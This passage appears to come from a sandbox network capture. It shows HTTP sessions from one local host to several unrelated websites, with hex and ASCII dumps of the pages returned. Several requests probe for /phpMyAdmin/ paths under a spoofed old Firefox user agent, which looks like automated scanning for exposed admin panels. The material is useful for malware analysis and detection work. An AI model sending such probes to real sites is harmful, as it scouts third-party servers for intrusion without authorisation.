2023-12-22 20:14:57 UTC	1252	IN	Data Raw: 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 74 68 69 72 64 2d 70 61 72 74 79 2f 66 6f 6e 74 73 2f 48 65 6c 76 65 74 69 63 61 2f 66 6f 6e 74 46 61 63 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 Data Ascii: ame="description" content=""> <meta name="viewport" content="width=device-width"> <meta name="robots" content="noindex, nofollow"> ... --> <link href="//static.parastorage.com/services/third-party/fonts/Helvetica/fontFace.css" rel="stylesheet" t
2023-12-22 20:14:57 UTC	1252	IN	Data Raw: 61 74 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 77 69 78 2d 70 75 62 6c 69 63 2f 31 2e 37 31 39 2e 30 2f 73 63 72 69 70 74 73 2f 65 72 72 6f 72 2d 70 61 67 65 73 2f 6c 6f 63 61 6c 65 2f 6d 65 73 73 61 67 65 73 5f 65 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 77 69 78 2d 70 75 62 6c 69 63 2f 31 2e 37 31 39 2e 30 2f 73 63 72 69 70 74 73 2f 65 72 72 6f 72 2d 70 61 67 65 73 2f 61 70 70 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 Data Ascii: ate.min.js"></script><script src="//static.parastorage.com/services/wix-public/1.719.0/scripts/error-pages/locale/messages_en.js"></script> ... --><script src="//static.parastorage.com/services/wix-public/1.719.0/scripts/error-pages/app.js"></scrip
2023-12-22 20:14:57 UTC	95	IN	Data Raw: 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 76 65 72 69 66 69 63 61 74 69 6f 6e 20 2d 2d 3e 0a 3c 21 2d 2d 20 65 6e 64 20 76 65 72 69 66 69 63 61 74 69 6f 6e 20 2d 2d 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: an> </div> </div></div>... verification -->... end verification --></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
118	192.168.2.4	60965	69.42.204.12	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:57 UTC	173	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: bldowney.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:57 UTC	164	IN	HTTP/1.1 404 Not Found Date: Fri, 22 Dec 2023 20:14:57 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1
2023-12-22 20:14:57 UTC	315	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use

Session ID	Source IP	Source Port	Destination IP	Destination Port
119	192.168.2.4	61033	209.124.80.122	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:57 UTC	170	OUT	GET /phpmyadmin/ HTTP/1.1 Host: cicfl.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:58 UTC	321	IN	HTTP/1.1 404 Not Found Date: Fri, 22 Dec 2023 20:14:57 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://cicfl.com/wp-json/>; rel="https://api.w.org/" Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2023-12-22 20:14:58 UTC	7871	IN	Data Raw: 33 64 61 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d Data Ascii: 3da4<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><meta name='robots' content='noindex, follow' /><!-
2023-12-22 20:14:58 UTC	7915	IN	Data Raw: 33 37 30 3b 7d 2e 61 73 74 2d 68 65 61 64 65 72 2d 62 72 65 61 6b 2d 70 6f 69 6e 74 20 2e 61 73 74 2d 6d 6f 62 69 6c 65 2d 6d 65 6e 75 2d 62 75 74 74 6f 6e 73 2d 6f 75 74 6c 69 6e 65 2e 6d 65 6e 75 2d 74 6f 67 67 6c 65 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 66 61 35 33 37 30 3b 63 6f 6c 6f 72 3a 23 66 61 35 33 37 30 3b 7d 2e 61 73 74 2d 68 65 61 64 65 72 2d 62 72 65 61 6b 2d 70 6f 69 6e 74 20 2e 61 73 74 2d 6d 6f 62 69 6c 65 2d 6d 65 6e 75 2d 62 75 74 74 6f 6e 73 2d 66 69 6c 6c 2e 6d 65 6e 75 2d 74 6f 67 67 6c 65 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 61 35 33 37 30 3b 63 6f 6c 6f 72 3a 23 66 66 66 66 66 66 3b 7d 2e 61 73 74 2d 68 65 61 64 65 72 2d 62 72 65 61 6b 2d Data Ascii: 370;}.ast-header-break-point .ast-mobile-menu-buttons-outline.menu-toggle{background:transparent;border:1px solid #fa5370;color:#fa5370;}.ast-header-break-point .ast-mobile-menu-buttons-fill.menu-toggle{background:#fa5370;color:#ffffff;}.ast-header-break-
2023-12-22 20:14:58 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2023-12-22 20:14:58 UTC	8192	IN	Data Raw: 31 66 34 30 0d 0a 6f 6d 6d 65 6e 74 2d 72 65 70 6c 79 2d 74 69 74 6c 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 33 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 36 34 32 38 35 37 31 34 32 38 35 37 31 72 65 6d 3b 7d 2e 61 73 74 2d 63 6f 6d 6d 65 6e 74 2d 6d 65 74 61 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 31 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 37 38 35 37 31 34 32 38 35 37 31 34 32 39 72 65 6d 3b 7d 2e 77 69 64 67 65 74 2d 74 69 74 6c 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 32 38 35 37 31 34 32 38 35 37 31 34 72 65 6d 3b 7d 62 6f 64 79 2c 62 75 74 74 6f 6e 2c 69 6e 70 75 74 2c 73 65 6c 65 63 74 2c 74 65 78 74 61 72 65 61 2c 2e 61 73 74 2d 62 75 74 74 6f 6e 2c 2e 61 73 74 2d 63 75 73 74 6f 6d 2d 62 75 74 74 Data Ascii: 1f40omment-reply-title{font-size:23px;font-size:1.6428571428571rem;}.ast-comment-meta{font-size:11px;font-size:0.78571428571429rem;}.widget-title{font-size:20px;font-size:1.4285714285714rem;}body,button,input,select,textarea,.ast-button,.ast-custom-butt
2023-12-22 20:14:58 UTC	7822	IN	Data Raw: 79 7b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 3a 20 23 30 30 30 30 30 30 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 3a 20 23 66 37 38 64 61 37 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 72 65 64 3a 20 23 63 66 32 65 32 65 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 3a 20 23 66 66 36 39 30 30 3b 2d 2d Data Ascii: y{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--
2023-12-22 20:14:58 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2023-12-22 20:14:58 UTC	8192	IN	Data Raw: 31 66 34 30 0d 0a 6e 74 2d 73 69 7a 65 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6d 65 64 69 75 6d 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 6c 61 72 67 65 2d 66 6f 6e 74 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6c 61 72 67 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 78 2d 6c 61 72 67 65 2d 66 6f 6e 74 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 78 2d 6c 61 72 67 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 Data Ascii: 1f40nt-size: var(--wp--preset--font-size--medium) !important;}.has-large-font-size{font-size: var(--wp--preset--font-size--large) !important;}.has-x-large-font-size{font-size: var(--wp--preset--font-size--x-large) !important;}</style><link rel='styles
2023-12-22 20:14:58 UTC	7822	IN	Data Raw: 2e 31 31 34 20 30 20 30 20 2e 32 39 39 20 2e 35 38 37 20 2e 31 31 34 20 30 20 30 20 2e 32 39 39 20 2e 35 38 37 20 2e 31 31 34 20 30 20 30 20 22 20 2f 3e 3c 66 65 43 6f 6d 70 6f 6e 65 6e 74 54 72 61 6e 73 66 65 72 20 63 6f 6c 6f 72 2d 69 6e 74 65 72 70 6f 6c 61 74 69 6f 6e 2d 66 69 6c 74 65 72 73 3d 22 73 52 47 42 22 20 3e 3c 66 65 46 75 6e 63 52 20 74 79 70 65 3d 22 74 61 62 6c 65 22 20 74 61 62 6c 65 56 61 6c 75 65 73 3d 22 30 2e 35 34 39 30 31 39 36 30 37 38 34 33 31 34 20 30 2e 39 38 38 32 33 35 32 39 34 31 31 37 36 35 22 20 2f 3e 3c 66 65 46 75 6e 63 47 20 74 79 70 65 3d 22 74 61 62 6c 65 22 20 74 61 62 6c 65 56 61 6c 75 65 73 3d 22 30 20 31 22 20 2f 3e 3c 66 65 46 75 6e 63 42 20 74 79 70 65 3d 22 74 61 62 6c 65 22 20 74 61 62 6c 65 56 61 6c 75 65 73 Data Ascii: .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 " /><feComponentTransfer color-interpolation-filters="sRGB" ><feFuncR type="table" tableValues="0.54901960784314 0.98823529411765" /><feFuncG type="table" tableValues="0 1" /><feFuncB type="table" tableValues
2023-12-22 20:14:58 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2023-12-22 20:14:58 UTC	1382	IN	Data Raw: 35 35 66 0d 0a 2d 63 6f 6c 2d 78 73 2d 31 32 22 20 3e 0d 0a 09 09 09 09 09 09 09 43 6f 70 79 72 69 67 68 74 20 c2 a9 20 32 30 32 33 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 61 73 74 2d 66 6f 6f 74 65 72 2d 73 69 74 65 2d 74 69 74 6c 65 22 3e 43 49 43 46 4c 20 7c 20 43 6f 6d 6d 65 72 63 69 61 6c 20 49 6e 64 75 73 74 72 69 61 6c 20 43 6f 72 70 3c 2f 73 70 61 6e 3e 20 7c 20 50 6f 77 65 72 65 64 20 62 79 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 61 73 74 2d 66 6f 6f 74 65 72 2d 73 69 74 65 2d 74 69 74 6c 65 22 3e 43 49 43 46 4c 20 7c 20 43 6f 6d 6d 65 72 63 69 61 6c 20 49 6e 64 75 73 74 72 69 61 6c 20 43 6f 72 70 3c 2f 73 70 61 6e 3e 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 0d 0a 09 09 09 09 09 0d 0a 09 09 09 09 09 3c 2f 64 69 76 3e 20 3c 21 2d Data Ascii: 55f-col-xs-12" >Copyright 2023 <span class="ast-footer-site-title">CICFL \| Commercial Industrial Corp</span> \| Powered by <span class="ast-footer-site-title">CICFL \| Commercial Industrial Corp</span></div></div> <!-

Session ID	Source IP	Source Port	Destination IP	Destination Port
120	192.168.2.4	60951	64.68.191.221	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:57 UTC	178	OUT	GET //phpmyadmin/ HTTP/1.1 Host: adelaideclub.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:57 UTC	364	IN	HTTP/1.1 301 Moved Permanently Content-Type: text/html; charset=utf-8 Location: https://www.adelaideclub.com/phpmyadmin/ X-Redirect-Reason: Wrong Portal Alias Requested Set-Cookie: dnn_IsMobile=False; path=/; HttpOnly X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Date: Fri, 22 Dec 2023 20:14:57 GMT Connection: close Content-Length: 157
2023-12-22 20:14:57 UTC	157	IN	Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 64 65 6c 61 69 64 65 63 6c 75 62 2e 63 6f 6d 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 68 32 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="https://www.adelaideclub.com/phpmyadmin/">here</a>.</h2></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
121	192.168.2.4	61155	104.21.52.80	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:57 UTC	164	OUT	GET / HTTP/1.1 Host: cannaclear.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:57 UTC	934	IN	HTTP/1.1 200 OK Date: Fri, 22 Dec 2023 20:14:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Access-Control-Allow-Origin: * Cache-Control: max-age=0 Expires: Fri, 22 Dec 2023 20:14:57 GMT Last-Modified: Fri, 22 Dec 2023 20:11:00 GMT Vary: X-Forwarded-Proto,Accept-Encoding,User-Agent Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=w9bkgBHvshl72MjEJRBa3%2FI%2FHfvuYolJhS6bzIl5g4ea4jJ4SdRYeZcmfN6Xt70eEEs7AVdCUAdw0vYdNI%2Fl5wOaQ7nAKvMJUGWYPGNEQ1SbTAjVLo5R%2BvbSR5ocVemWTA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} expect-ct: max-age=86400, enforce referrer-policy: same-origin x-content-type-options: nosniff x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block Server: cloudflare CF-RAY: 839b08ba0a746dcd-MIA alt-svc: h3=":443"; ma=86400
2023-12-22 20:14:57 UTC	435	IN	Data Raw: 34 64 63 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 20 63 6c 61 73 73 3d 22 6c 6f 61 64 69 6e 67 2d 73 69 74 65 20 6e 6f 2d 6a 73 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 68 74 6d 6c 29 7b 68 74 6d 6c 2e 63 6c 61 73 73 4e 61 6d 65 20 3d 20 68 74 6d 6c 2e 63 6c 61 73 73 4e 61 6d 65 2e 72 65 70 6c 61 63 65 28 2f 5c 62 6e Data Ascii: 4dcb<!DOCTYPE html><html lang="en-US" prefix="og: https://ogp.me/ns#" class="loading-site no-js"><head><meta charset="UTF-8" /><link rel="profile" href="https://gmpg.org/xfn/11" /><script>(function(html){html.className = html.className.replace(/\bn
2023-12-22 20:14:57 UTC	1369	IN	Data Raw: 43 61 6e 6e 61 43 6c 65 61 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 42 75 6c 6b 20 44 65 6c 74 61 2d 38 20 54 48 43 20 70 72 6f 64 75 63 74 73 20 61 74 20 75 6e 62 65 61 74 61 62 6c 65 20 70 72 69 63 65 73 2e 20 42 75 79 20 44 65 6c 74 61 20 38 20 54 48 43 20 4f 69 6c 2c 20 44 38 20 56 61 70 65 73 2c 20 48 48 43 2c 20 54 48 43 2d 4f 2c 20 48 48 43 2d 4f 20 61 6e 64 20 6f 74 68 65 72 20 63 61 6e 6e 61 62 69 6e 6f 69 64 73 20 6f 6e 6c 69 6e 65 2e 20 53 68 6f 70 20 6e 6f 77 21 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 66 6f 6c 6c 6f 77 2c 20 69 6e 64 65 78 2c 20 6d 61 78 2d 73 6e 69 70 70 65 74 3a 2d 31 2c 20 Data Ascii: CannaClear</title><meta name="description" content="Bulk Delta-8 THC products at unbeatable prices. Buy Delta 8 THC Oil, D8 Vapes, HHC, THC-O, HHC-O and other cannabinoids online. Shop now!" /><meta name="robots" content="follow, index, max-snippet:-1,
2023-12-22 20:14:57 UTC	1369	IN	Data Raw: 5f 64 61 74 65 22 20 63 6f 6e 74 65 6e 74 3d 22 32 30 32 30 2d 31 31 2d 30 35 45 53 54 30 37 3a 30 34 3a 34 37 2d 30 35 3a 30 30 22 20 2f 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 79 61 3a 6f 76 73 3a 61 6c 6c 6f 77 5f 65 6d 62 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 66 61 6c 73 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 63 61 72 64 22 20 63 6f 6e 74 65 6e 74 3d 22 73 75 6d 6d 61 72 79 5f 6c 61 72 67 65 5f 69 6d 61 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 42 75 79 20 44 65 6c 74 61 20 38 20 54 48 43 20 7c 20 42 75 79 20 44 65 6c 74 61 2d 38 20 54 48 43 20 42 75 6c 6b 20 44 69 73 74 69 6c 6c 61 74 65 20 4f 6e 6c 69 6e 65 20 Data Ascii: _date" content="2020-11-05EST07:04:47-05:00" /><meta property="ya:ovs:allow_embed" content="false" /><meta name="twitter:card" content="summary_large_image" /><meta name="twitter:title" content="Buy Delta 8 THC \| Buy Delta-8 THC Bulk Distillate Online
2023-12-22 20:14:57 UTC	1369	IN	Data Raw: 69 64 3d 22 77 63 2d 61 75 74 68 6f 72 69 7a 65 2d 6e 65 74 2d 63 69 6d 2d 63 68 65 63 6b 6f 75 74 2d 62 6c 6f 63 6b 2d 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 61 6e 6e 61 63 6c 65 61 72 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 63 61 63 68 65 2f 6d 69 6e 2f 31 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 67 61 74 65 77 61 79 2d 61 75 74 68 6f 72 69 7a 65 2d 6e 65 74 2d 63 69 6d 2f 61 73 73 65 74 73 2f 63 73 73 2f 62 6c 6f 63 6b 73 2f 77 63 2d 61 75 74 68 6f 72 69 7a 65 2d 6e 65 74 2d 63 69 6d 2d 63 68 65 63 6b 6f 75 74 2d 62 6c 6f 63 6b 2e 63 73 73 3f 76 65 72 3d 31 37 30 33 30 30 31 38 31 37 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 Data Ascii: id="wc-authorize-net-cim-checkout-block-css" href="https://cannaclear.com/wp-content/cache/min/1/wp-content/plugins/woocommerce-gateway-authorize-net-cim/assets/css/blocks/wc-authorize-net-cim-checkout-block.css?ver=1703001817" type="text/css" media="all"
2023-12-22 20:14:57 UTC	1369	IN	Data Raw: 74 3b 0a 09 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 22 77 70 2d 62 6c 6f 63 6b 2d 6c 69 62 72 61 72 79 2d 69 6e 6c 69 6e 65 2d 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3a 72 6f 6f 74 7b 2d 2d 77 70 2d 61 64 6d 69 6e 2d 74 68 65 6d 65 2d 63 6f 6c 6f 72 3a 23 30 30 37 63 62 61 3b 2d 2d 77 70 2d 61 64 6d 69 6e 2d 74 68 65 6d 65 2d 63 6f 6c 6f 72 2d 2d 72 67 62 3a 30 2c 31 32 34 2c 31 38 36 3b 2d 2d 77 70 2d 61 64 6d 69 6e 2d 74 68 65 6d 65 2d 63 6f 6c 6f 72 2d 64 61 72 6b 65 72 2d 31 30 3a 23 30 30 36 62 61 31 3b 2d 2d 77 70 2d 61 64 6d 69 6e 2d 74 68 65 6d 65 2d 63 6f 6c 6f 72 2d 64 61 72 6b 65 72 2d 31 30 2d 2d 72 67 62 3a 30 2c 31 30 37 2c 31 36 31 3b 2d 2d 77 70 2d 61 64 6d 69 6e 2d 74 68 65 6d 65 2d 63 6f Data Ascii: t;}</style><style id="wp-block-library-inline-css" type="text/css">:root{--wp-admin-theme-color:#007cba;--wp-admin-theme-color--rgb:0,124,186;--wp-admin-theme-color-darker-10:#006ba1;--wp-admin-theme-color-darker-10--rgb:0,107,161;--wp-admin-theme-co
2023-12-22 20:14:57 UTC	1369	IN	Data Raw: 67 72 61 64 69 65 6e 74 2d 62 61 63 6b 67 72 6f 75 6e 64 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 23 33 33 30 39 36 38 2c 23 33 31 63 64 63 66 29 7d 3a 72 6f 6f 74 20 2e 68 61 73 2d 6d 69 64 6e 69 67 68 74 2d 67 72 61 64 69 65 6e 74 2d 62 61 63 6b 67 72 6f 75 6e 64 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 23 30 32 30 33 38 31 2c 23 32 38 37 34 66 63 29 7d 2e 68 61 73 2d 72 65 67 75 6c 61 72 2d 66 6f 6e 74 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 7d 2e 68 61 73 2d 6c 61 72 67 65 72 2d 66 6f 6e 74 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 36 32 35 65 6d 7d 2e 68 61 73 2d 6e 6f 72 6d 61 6c 2d 66 6f 6e 74 Data Ascii: gradient-background{background:linear-gradient(135deg,#330968,#31cdcf)}:root .has-midnight-gradient-background{background:linear-gradient(135deg,#020381,#2874fc)}.has-regular-font-size{font-size:1em}.has-larger-font-size{font-size:2.625em}.has-normal-font
